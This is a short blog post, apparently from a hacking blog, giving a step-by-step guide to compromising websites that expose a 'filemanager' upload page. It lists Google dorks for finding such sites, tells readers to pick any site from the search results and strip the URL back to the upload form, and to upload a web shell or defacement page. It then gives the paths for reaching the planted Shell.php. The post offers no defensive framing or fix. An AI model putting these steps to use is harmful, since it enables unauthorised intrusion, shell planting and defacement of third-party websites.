Sunday, September 23, 2012

Following is the vulnerability to remotly upload your shell or deface on a vulnerable website.

Google Dorks:
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
Vulnerable URL:
http://www.site.com/filemanager/index.html
Now, google the dork and select any website from the search result.
When you will select any website, the URL will be as
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Now delete the text after filemanager. Now after deleteing the text URL will be
http://www.site.com/filemanager/
You will get a upload option, upload your shell or deface there.
Your will will be uploaded in Userfiles directory. z
To view your shell visit the below mentioned URLs:
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html

"File Manager" Remote Shell and Deface Upload Vulnerability.

  • Uploaded by: MIN Software
  • Views:
  • Category: , , ,
    • Share

    0 comments:

    Post a Comment

    Subscribe to: Post Comments (Atom)

     

    Our Team Members

    Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com